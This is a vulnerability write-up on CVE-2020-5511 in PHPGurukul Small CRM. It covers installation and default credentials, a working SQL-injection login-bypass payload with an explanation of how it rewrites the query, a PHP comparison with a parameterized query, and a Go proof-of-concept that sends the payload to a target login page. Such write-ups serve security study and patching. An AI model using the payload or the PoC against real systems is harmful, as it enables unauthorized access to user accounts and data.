Product overview

PHPGurukul Small CRM is a customer relationship management system.


System details

Language Used: PHP

Database: MySQL

User Interface Design: PHP 5.6 or above, MySQL, HTML, CSS, JavaScript, jQuery, AJAX

Web Browser: Mozilla, Google Chrome, IE8, Opera

Software: XAMPP / WAMP / MAMP / LAMP (any one)


Environment setup

Download: https://phpgurukul.com/?smd_process_download=1&download_id=10412

Installation steps:

  1. Download the zip archive

  2. Extract it and copy the crm folder

  3. Paste it into the web root directory (for XAMPP xampp/htdocs, for WAMP wamp/www, for LAMP var/www/html)

  4. Open phpMyAdmin (http://localhost/phpmyadmin)

  5. Create the CRM database

  6. Import crm.sql (given inside the zip package in the SQL file folder)

  7. Visit http://localhost/dfsms



Default login credentials

Username: admin
Password: Test@123


A successful login confirms that the database connection is working.


CVE-2020-5511

Vulnerability details

Name: PHPGurukul Small CRM SQL injection vulnerability

Type: SQL injection

Severity: High

Source: https://www.exploit-db.com/exploits/47874


Page access

Username: '=''or '1' = '1'; -- -

Password: any non-empty string



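How it works

admin' or

The quote after admin breaks out of the original query: it closes the string literal, the rest of the statement is commented out, and or '1' = '1' makes the query condition true.

Login logic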


Original query: "SELECT * FROM user WHERE email='".$_POST['email']."' and password='".$_POST['password']."'"

With the payload substituted, it becomes:

SELECT * FROM user WHERE email=''=''or '1' = '1'; -- -' and password='a'


The query returns 5 users; the login check is bypassed whenever the number of returned users is greater than 0.
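
The login query above next to a parameterized version, as an added example that is not part of the original post or the application's code. It assumes PDO with an in-memory SQLite database standing in for the MySQL user table; the function names and the sample row are constructed for illustration.

```php
<?php
// Added example, not the application's code. An in-memory SQLite database
// stands in for the MySQL `user` table (assumption); the row is constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT)");
$db->exec("INSERT INTO user (email, password) VALUES ('alice@example.test', 'constructed-secret')");

// Same shape as the query quoted above: request values are concatenated
// into the SQL text, so a quote in $email changes the statement itself.
// (Hypothetical function name.)
function loginConcatenated(PDO $db, string $email, string $password): int
{
    $sql = "SELECT * FROM user WHERE email='" . $email . "' and password='" . $password . "'";
    return count($db->query($sql)->fetchAll());
}

// Hardened form: the SQL text is fixed and the values are bound as
// parameters, so they are only ever compared as data.
// (Hypothetical function name.)
function loginPrepared(PDO $db, string $email, string $password): int
{
    $stmt = $db->prepare("SELECT * FROM user WHERE email = :email AND password = :password");
    $stmt->execute([':email' => $email, ':password' => $password]);
    return count($stmt->fetchAll());
}

// Constructed inputs: a valid login, a wrong password, and the username
// value shown in the page access section.
$cases = [
    'valid credentials' => ['alice@example.test', 'constructed-secret'],
    'wrong password'    => ['alice@example.test', 'a'],
    'payload from page' => ["'=''or '1' = '1'; -- -", 'a'],
];
foreach ($cases as $label => [$email, $password]) {
    printf("%-18s concatenated=%d row(s)  prepared=%d row(s)\n",
        $label, loginConcatenated($db, $email, $password), loginPrepared($db, $email, $password));
}
```

Any login check of the form "row count greater than 0" is only safe with the second function, where the payload is treated as a literal email address and matches no row.
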

Code implementation

// @Title  PHPGurukul Small CRM SQL injection vulnerability
// @Description PoC for the PHPGurukul Small CRM SQL injection vulnerability
// @Author lennon
// @Update 2021-01-06
package main

import (
	"fmt"
	"io"
	"net/http"
	"strings"
)

func main() {
	// Login page of the test instance; replace your-ip with its address.
	url := "http://your-ip/crm/index.php"
	method := "POST"

	// URL-encoded login form: the email field carries the username value
	// shown above, the password is any non-empty string.
	payload := strings.NewReader(`email=%27%3D%27%27or++%271%27+%3D+%271%27%3B+--+-&password=a&login=`)

	client := &http.Client{}
	req, err := http.NewRequest(method, url, payload)
	if err != nil {
		fmt.Println(err)
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Add("Cookie", "PHPSESSID=b203fa4101b75860a7eccdacf076f177")

	res, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res.Body.Close()

	body, err := io.ReadAll(res.Body)
	if err != nil {
		fmt.Println(err)
		return
	}
	// A redirect script to home.php in the response means the login succeeded.
	if strings.Contains(string(body), `window.location.href='home.php'`) {
		fmt.Println("存在CVE-2020-5511漏洞") // "CVE-2020-5511 vulnerability present"
	} else {
		fmt.Println("未检测到CVE-2020-5511漏洞") // "CVE-2020-5511 vulnerability not detected"
	}
}
